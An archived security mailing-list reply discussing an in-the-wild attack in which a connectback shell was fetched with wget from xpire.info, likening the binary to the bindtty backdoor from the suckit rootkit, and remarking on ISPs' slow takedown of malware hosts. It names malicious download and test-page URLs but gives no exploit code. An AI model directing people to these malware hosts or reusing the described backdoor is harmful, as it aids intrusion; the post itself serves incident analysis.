| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: nick at virus-l.demon.co.uk (Nick FitzGerald) Subject: xpire.info & splitinfinity.info - exploits in the wild Elia Florio wrote: > > I'm not sure that qmail-inject isn't a red herring? The actual > > download looks like 'wget' was used. > Good suggestion, my friend :) > > It was used WGET to retrieve the http://xpire.info/cli.gz connectback shell. More specifically, from the strings in the binary it looks awfully like sd's bindtty -- try Googling for "bindtty.c"... The possible bad news is that bindtty is used in the suckit rootkit, so your remote-only access may cause major (if not insurmountable) problems to doing a half-useful diagnosis... <<big snip>> > The hacker page used to accomplish the injection are based on this > test-page, taken directly on the hacker-site :-) > > http://xpire.info/s/2 > http://xpire.info/s/ > > I notice that this site is full of trojan/backdoor/shell/worm/exploit and > other malware....why is it still open? You'd be surprised how few folk actually compain about a lot of these sites. Compound that with the rate of incompetence at many small (and even many not-so-small) ISPs, where the very thin margins mean they don't have time (and seldom good enough staff anyway) to analyse such complaints, and where the emphasis is often more on making sure they get their $10, $20, $40, etc this month from that customer, and many such sites stay up way too long. The way to break such sites is for some "authority" to contact them (a CERT, law enforcement, etc) or "enough" polite, professional, clearly technically competent but not overly technical complaints explaining what the site is being used for and why it should be shut down. Of course, often the "base" sites are themselves simply just ill-maintained systems that have, themselves, been hacked and if all the ISP is up to doing is closing the apparently rogue site/account, or simply removing the "offending content" the site (and others similarly hosted on the still badly maintained servers) remains open to further, similar abuse. Regards, Nick FitzGerald
Powered by blists - more mailing lists